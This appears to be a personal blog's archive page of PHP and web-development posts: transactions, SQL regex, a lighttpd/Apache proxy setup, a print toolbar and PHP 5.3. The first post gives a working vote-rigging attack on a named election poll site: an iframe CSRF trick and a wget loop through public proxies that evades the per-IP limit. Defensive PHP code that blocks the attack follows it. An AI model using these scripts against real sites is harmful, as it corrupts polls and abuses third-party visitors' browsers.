Author Archives: Adil - Page 2

wget as a hacker tool

A few days ago some people who call themselves web programmers created a web site for online voting for the parliament in my country. It was a simple system: you select your region, select the candidate and vote for him. The purpose of the system was to get an approximate picture of the election results…

One of the sites submitted the vote with a GET request. The only limit was on the IP address: one vote per IP address. A GET request that changes state can be triggered by any page that embeds the URL, so many people took the request URL and put it on their own web sites as an iframe, img or something else. For example:
http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER

You put this on the iframe in your page

<iframe src="http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER"></iframe>

and every visitor to your page automatically votes for “your” candidate, from the visitor’s own IP address. This is a classic cross-site request forgery, and it defeats the one-vote-per-IP limit without any effort at all.

GNU wget is a good tool for downloading files from the internet (or any other network), and it has a lot of options for what to do while downloading. The most important option for “voting” purposes is --proxy: wget takes the proxy from the http_proxy environment variable, so this little bash script will do the job:

while read -r proxy
do
    export http_proxy="$proxy"      # wget reads the proxy from the environment
    wget --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER"
done < proxy.list

Google for a proxy server list, paste it into a proxy.list file in the current directory (one proxy per line, in the form http://host:port) and run the script: it votes for your candidate once through each proxy, so the recorded IP address is the proxy’s, not yours.

Most public proxies are dead or slow, so a single bad one can stall the loop for minutes. To speed the process up, allow one try and a short timeout per proxy and run the requests in the background:

while read -r proxy
do
    export http_proxy="$proxy"
    # one attempt, 10 second timeout, and do not wait for the request to finish
    wget --tries=1 --timeout=10 --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER" &
done < proxy.list

Another web site used POST requests. That is no obstacle either: wget has a --post-data option, so the same loop works with wget --post-data=‘daireid=55&namizedid=74’. Switching from GET to POST only helps if the server also checks something the attacker cannot forge or replay. :)

Hmmm. Using a captcha would stop both the embedded-URL trick and the script, because every vote would then need a human; it is the simplest fix for an unauthenticated poll…
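Here is what the hardened vote handler looks like on the PHP side. This is an added example, not code from the voting site or from the original post: the function names are hypothetical, the captcha check is a stand-in closure for whatever captcha library you use, and it uses PHP 7 functions (random_bytes, hash_equals, ??) rather than 5.3-era code. In a real vote.php the `$session` array is `$_SESSION` after session_start(), `$post` is `$_POST`, and the form embeds the token as a hidden field.

```php
<?php
// Added example (not from the original post): a vote handler that is immune
// to the embedded <iframe>/<img> trick and much harder to drive with a wget
// loop. All names are hypothetical.

// Issue (or reuse) a secret token bound to this session; the form embeds it
// as <input type="hidden" name="token" value="...">.
function vote_token(array &$session): string {
    if (empty($session['vote_token'])) {
        $session['vote_token'] = bin2hex(random_bytes(32));
    }
    return $session['vote_token'];
}

// Returns true only when every check passes; nothing is recorded otherwise.
function accept_vote(string $method, array $post, array &$session, callable $captcha_ok): bool {
    // 1. Only POST changes state. An <iframe> or <img> can only issue GET,
    //    so embedding the URL on another page no longer casts a vote.
    if ($method !== 'POST') {
        return false;
    }
    // 2. The token must equal the one in *this* session. A page on another
    //    site cannot read it, so a forged cross-site request fails here, and
    //    a script has to fetch the form and parse the token for every vote.
    if (empty($session['vote_token']) || !isset($post['token'])
        || !hash_equals($session['vote_token'], (string) $post['token'])) {
        return false;
    }
    // 3. One vote per session. This replaces the per-IP limit, which proxies
    //    defeat. On its own it is weak (new sessions are free), hence check 4.
    if (!empty($session['has_voted'])) {
        return false;
    }
    // 4. A captcha makes each vote cost human attention, which is what breaks
    //    "wget --post-data" in a loop. $captcha_ok wraps your captcha library.
    if (!$captcha_ok((string) ($post['captcha'] ?? ''))) {
        return false;
    }
    $session['has_voted'] = true;
    unset($session['vote_token']);     // the token is single use
    return true;
}

// Constructed walk-through (no web server needed): the form is rendered once,
// then the same token is presented in four different ways.
$session = [];
$token = vote_token($session);
$captcha_ok = function (string $answer): bool { return $answer === 'cat'; }; // stand-in captcha
var_dump(accept_vote('GET',  ['token' => $token, 'captcha' => 'cat'], $session, $captcha_ok)); // embedded <img>/<iframe>
var_dump(accept_vote('POST', ['token' => 'x',    'captcha' => 'cat'], $session, $captcha_ok)); // forged token
var_dump(accept_vote('POST', ['token' => $token, 'captcha' => 'cat'], $session, $captcha_ok)); // the genuine vote
var_dump(accept_vote('POST', ['token' => $token, 'captcha' => 'cat'], $session, $captcha_ok)); // replay of the same vote
```

The order of the checks matters: the cheap ones (method, token) run before anything that costs a database lookup or a captcha round trip, so a flood of forged requests is rejected as early as possible.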

Ignoring browser commands

I have rarely encountered this situation, but in larger projects it is certainly a common problem. Assume that a script performs some queries on the database (deleting / adding / editing) and while it runs the user presses the Stop button in the browser. PHP then terminates the script as soon as it notices the closed connection (normally when it next tries to send output), which in our case can leave the database with only half of the changes applied.

This problem is solved by the function ignore_user_abort(): with it set to true, the script keeps running to the end even after the client has disconnected.

ignore_user_abort(true);

// ... execute the database queries ...

ignore_user_abort(false);

Original source: http://i-novice.net/poleznye-php-tryuki/

Note: the best solution for such problems is a database transaction :) ignore_user_abort() only protects against the browser; a transaction also protects against the script dying for any other reason (a fatal error, a killed process), because the database itself rolls back anything that was not committed.
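Both techniques together, as an added example that is not from the original post: ignore_user_abort() keeps the script alive through a client disconnect, and the PDO transaction guarantees that either both updates land or neither does. The accounts(id, balance) table and the transfer scenario are constructed for the example; it uses an in-memory SQLite database so it runs stand-alone, and needs PHP 7 for Throwable.

```php
<?php
// Added example (not from the original post): ignore_user_abort() combined
// with a database transaction. Table and data are constructed for the demo.
function transfer(PDO $db, int $from, int $to, int $amount): bool {
    ignore_user_abort(true);              // the Stop button no longer kills the script half-way
    $db->beginTransaction();
    try {
        // Debit only if the balance covers the amount (the WHERE clause makes this atomic).
        $debit = $db->prepare(
            'UPDATE accounts SET balance = balance - :amt WHERE id = :id AND balance >= :min');
        $debit->execute([':amt' => $amount, ':id' => $from, ':min' => $amount]);
        if ($debit->rowCount() !== 1) {
            throw new RuntimeException('insufficient funds or unknown account');
        }
        $credit = $db->prepare('UPDATE accounts SET balance = balance + :amt WHERE id = :id');
        $credit->execute([':amt' => $amount, ':id' => $to]);
        $db->commit();                    // both rows change, or neither does
        return true;
    } catch (Throwable $e) {
        $db->rollBack();                  // undo the debit if anything after it failed
        return false;
    } finally {
        ignore_user_abort(false);         // runs after return or rollback alike
    }
}

// Stand-alone demo with constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);   // make execute() throw instead of returning false
$db->exec('CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER NOT NULL)');
$db->exec('INSERT INTO accounts VALUES (1, 100), (2, 0)');
var_dump(transfer($db, 1, 2, 60));   // first transfer: covered by the balance
var_dump(transfer($db, 1, 2, 60));   // second transfer exceeds what is left, so it is rolled back
var_dump($db->query('SELECT id, balance FROM accounts ORDER BY id')->fetchAll(PDO::FETCH_ASSOC));
```

PDO::ERRMODE_EXCEPTION is the important setting: without it a failed execute() silently returns false, the exception path is never taken and the commit() goes ahead with a half-done transfer.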

fixed position on IE6

Fixed positioning keeps an XHTML element at the same coordinates in the viewport, so it does not move when you scroll the page. A popular example is the Facebook panel.

#elementId {
    position:fixed;
    bottom:0;
}

The example above keeps the element at the bottom of the page.

But IE6 does not support position:fixed, and this can be worked around with JavaScript. Simply get the script from the reference below, host a copy on your own server (it is third-party code, so review it before you include it) and include it in your page:

<script type="text/javascript" src="fixed.js"></script>

Reference:

http://www.doxdesk.com/software/js/fixed.html

Regular expressions in SQL queries

Regular expressions are useful for parsing strings, matching patterns, validating, etc. Since SQL queries deal with strings too, I think it is a good idea to use them there as well.

Let we have table users:

mysql> SELECT * FROM users;
+----+-----------+----------+----------------------+
| id | first     | last     | email                |
+----+-----------+----------+----------------------+
|  1 | John      | SMITH    | jsmith@example.az    |
|  2 | Bill      | Gates    | bgates@example.ru    |
|  3 | Steve     | Jobs     | sjobs@example.de     |
|  4 | Sylvester | Stallone | stallone@example.com |
|  5 | Chuck     | Norris   | cnorris@example.net  |
|  6 | Bruce     | Lee      | blee@example1.net    |
+----+-----------+----------+----------------------+
6 rows in set (0.00 sec)

Now we want the users whose email ends with a three-letter TLD (.com, .net, .org etc.). With LIKE, _ matches exactly one character, so we can do this as follows:

mysql> SELECT * FROM users WHERE email LIKE '%.___';
+----+-----------+----------+----------------------+
| id | first     | last     | email                |
+----+-----------+----------+----------------------+
|  4 | Sylvester | Stallone | stallone@example.com |
|  5 | Chuck     | Norris   | cnorris@example.net  |
|  6 | Bruce     | Lee      | blee@example1.net    |
+----+-----------+----------+----------------------+
3 rows in set (0.00 sec)

Well.

What can we do if we need the users whose email ends with a digit, a dot and a three-letter TLD (blee@example1.net)? LIKE has no character classes. Oops.

I’ll not lie, I don’t know how to do it with ANSI SQL, so I’ll use RDBMS-specific functions. This example works for MySQL. Note the doubled backslash: in a MySQL string literal the backslash is an escape character, so '\.' reaches the regex engine as a bare '.', which matches any character (it happens to give the same rows here, but it is not the pattern you meant). Also, REGEXP on non-binary strings is case-insensitive, so [a-z] matches uppercase TLDs as well.

mysql> SELECT * FROM users WHERE email REGEXP '^.+[0-9]\\.[a-z]{3}$';
+----+-------+------+-------------------+
| id | first | last | email             |
+----+-------+------+-------------------+
|  6 | Bruce | Lee  | blee@example1.net |
+----+-------+------+-------------------+
1 row in set (0.00 sec)

For Oracle it is as follows (Oracle string literals have no backslash escapes, so a single backslash is right here):

SELECT * FROM users WHERE REGEXP_LIKE(email,'^.+[0-9]\.[a-z]{3}$')

Thanks to my co-worker Mahir for the idea ;)

Reference:
http://www.oracle.com/technology/oramag/webcolumns/2003/techarticles/rischert_regexp_pt1.html
http://dev.mysql.com/doc/refman/5.1/en/regexp.html

phpasswd tool

This week my friends from the Neats group and I made a little tool for working with htpasswd files.

The main purpose of the project was an easy-to-use tool for changing admin passwords on the administration panel of the Baku State University web site.

We released the project as open source; it is hosted on Kenai. You can download it from http://kenai.com/projects/phpasswd

It uses the ExtJS library for flexibility.

font-size and print “toolbar” :)

Sometimes users need to make the font size larger to read the text comfortably. This is usually needed on news portals or sites like the web site of my university, www.bsu.edu.az.

It is also good to offer a print version of the page. By print version I mean black text on a white background, without any styles or anything else.

Let’s begin. Simply insert this code to your HTML page:

<script type="text/javascript" src="http://tpl.bdu.az/toolbar.js"></script>
<div style="text-align:right" id="adilToolbar">
<a href="javascript:adilTextDec('content')"><img src="http://tpl.bdu.az/images/font_size_less.png"/></a>
<a href="javascript:adilTextInc('content')"><img src="http://tpl.bdu.az/images/font_size_up.png"/></a>
<a href="javascript:adilTextPrint('content')"><img src="http://tpl.bdu.az/images/printer.png"/></a>
</div>

toolbar.js:

 
var adilTextSize = 100; // the current text size in percent, shared by both buttons

function adilTextInc(objid) {
    // 200% is large enough; stop incrementing once we reach it
    if (adilTextSize < 200) adilTextSize += 20; // increment by 20%
    document.getElementById(objid).style.fontSize = adilTextSize + '%';
}

function adilTextDec(objid) {
    // do not go below 60%
    if (adilTextSize > 60) adilTextSize -= 20; // decrement by 20%
    document.getElementById(objid).style.fontSize = adilTextSize + '%';
}

function adilTextPrint(objid) {
    // open a new, unstyled window
    var doc = window.open('', 'name', 'height=600,width=800');

    doc.document.write('<html><head><title>Print a page</title>');
    doc.document.write('</head><body>');

    // copy the content of the page; any scripts inside it run again in the new window
    doc.document.write(document.getElementById(objid).innerHTML);

    // remove our toolbar if it was copied along with the content
    // (the closing tag is written as <\/script> so this file can also be inlined)
    doc.document.write('<script type="text/javascript">');
    doc.document.write('try{document.getElementById(\'adilToolbar\').style.display=\'none\';}catch(e){}');
    doc.document.write('<\/script>');

    doc.document.write('</body></html>');

    // finish writing so the document is fully parsed
    doc.document.close();

    // print the page
    doc.print();
}

P.S. The button for decreasing the font size is for eagles. :-P

lighttpd frontend + apache backend

I think you have seen URLs like static.blablabla.com on your favourite web sites. What are they?

Apache HTTPD uses more memory and CPU as the number of open connections grows, and that makes the web site load slower. Lightweight web servers like lighttpd, nginx etc. are used to solve this problem.

I will show you how to use lighttpd as a proxy in front of Apache and separate static content from dynamic. Let’s begin.

First of all change the apache port.

#Listen 80
Listen 81

I recommend blocking direct access to port 81 with a firewall, or, better, binding Apache to the loopback interface only, so that nobody can bypass lighttpd and talk to Apache directly.

So Apache will listen on port 81 and lighttpd on port 80, and lighttpd will forward requests to Apache. The client connections are held by lighttpd; Apache only holds the connections between lighttpd and itself.

Now restart apache:
Linux:

/etc/init.d/apache2 restart

Windows:

net stop apache2
net start apache2

Now time to install lighttpd. Follow the instructions at http://www.lighttpd.net/

Edit the configuration file lighttpd.conf in its directory.
Add the following lines:

# Proxy the hosts that serve dynamic content to apache
$HTTP["host"] == "blabla.com" {
  proxy.server = ("" => ( (
        "host" => "127.0.0.1",
        "port" => 81 ) )
  )
}
 
# make virtual host for static content.
$HTTP["host"] == "static.blabla.com" {
  var.server_name = "static.blabla.com"
  server.name = server_name
  server.document-root = "/srv/www/vhosts/static"
}

Make sure the following modules are enabled in lighttpd:

server.modules = (
  "mod_access",
  "mod_alias",
  "mod_redirect",
  "mod_rewrite",
  "mod_proxy",
  "mod_accesslog"
)

Save the file and restart lighttpd with /etc/init.d/lighttpd restart. Enjoy.
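One side effect to keep in mind: every request now reaches Apache from 127.0.0.1, so REMOTE_ADDR in PHP is the proxy, not the visitor (an IP-based limit like the one in the voting post above would count all visitors as one). lighttpd’s mod_proxy passes the visitor’s address in the X-Forwarded-For header, but that header can be set by anyone who reaches port 81 directly, which is why Apache should be bound to the loopback interface (Listen 127.0.0.1:81 instead of Listen 81). The helper below is an added example, not part of the original post; the function name is hypothetical and the trusted address matches the "host" => "127.0.0.1" entry in the lighttpd configuration.

```php
<?php
// Added example (not from the original post): recover the real client address
// behind the lighttpd proxy without trusting a forgeable header blindly.
function client_ip(array $server, array $trusted_proxies = ['127.0.0.1']): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    // Only a request that really came through our proxy may carry a
    // trustworthy X-Forwarded-For; a direct hit on port 81 can forge it.
    if (!in_array($remote, $trusted_proxies, true)) {
        return $remote;
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $remote;
    }
    // The proxy adds the address it saw as the last entry; earlier entries
    // (if any) were supplied by the client and are not trustworthy.
    $hops = array_map('trim', explode(',', $xff));
    $ip = end($hops);
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : $remote;
}

// Constructed $_SERVER arrays for a stand-alone run (documentation IP ranges).
var_dump(client_ip(['REMOTE_ADDR' => '127.0.0.1',
                    'HTTP_X_FORWARDED_FOR' => '203.0.113.9']));            // via lighttpd
var_dump(client_ip(['REMOTE_ADDR' => '127.0.0.1',
                    'HTTP_X_FORWARDED_FOR' => '10.0.0.1, 203.0.113.9']));  // client sent its own XFF first
var_dump(client_ip(['REMOTE_ADDR' => '198.51.100.7',
                    'HTTP_X_FORWARDED_FOR' => '203.0.113.9']));            // direct hit: header ignored
```

Use the result of client_ip() wherever the application previously read $_SERVER['REMOTE_ADDR'] (logging, rate limits, the one-vote-per-IP check), and keep the list of trusted proxies as short as the real topology.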

PHP 5.3 is released

I am happy to announce the PHP 5.3 release. Some of the advantages of PHP 5.3 are the following:

namespaces (http://php.net/namespaces)
With namespace support, grouping or packaging classes becomes easier and neater. As a Java and .NET lover I like this feature very much.

anonymous functions (http://www.php.net/manual/en/functions.anonymous.php)
JavaScript fans will like it. It is not a good idea to use anonymous functions everywhere, but they are very useful for very short functions that are used for a single task.

Late Static Bindings (http://php.net/lsb)
A static method can now refer to the class it was called on (static::) rather than the class it was defined in.

Improvement on ternary operator (http://php.net/ternary)
You can now leave out the middle part of the ternary operator. The expression cond ?: expression is valid, while it was not in earlier versions of PHP.

Flexibility in php.ini (http://www.php.net/manual/en/ini.sections.php)
You can define settings that depend on the PATH or HOST the script runs under.

MySQL native drivers (http://php.net/mysqli.mysqlnd)
You don’t need to install the MySQL client library to work with a remote MySQL server any more; PHP’s own driver (mysqlnd) is enough.

Hmmm. I will be waiting for Zend Framework and Zend Server optimized for PHP 5.3 :)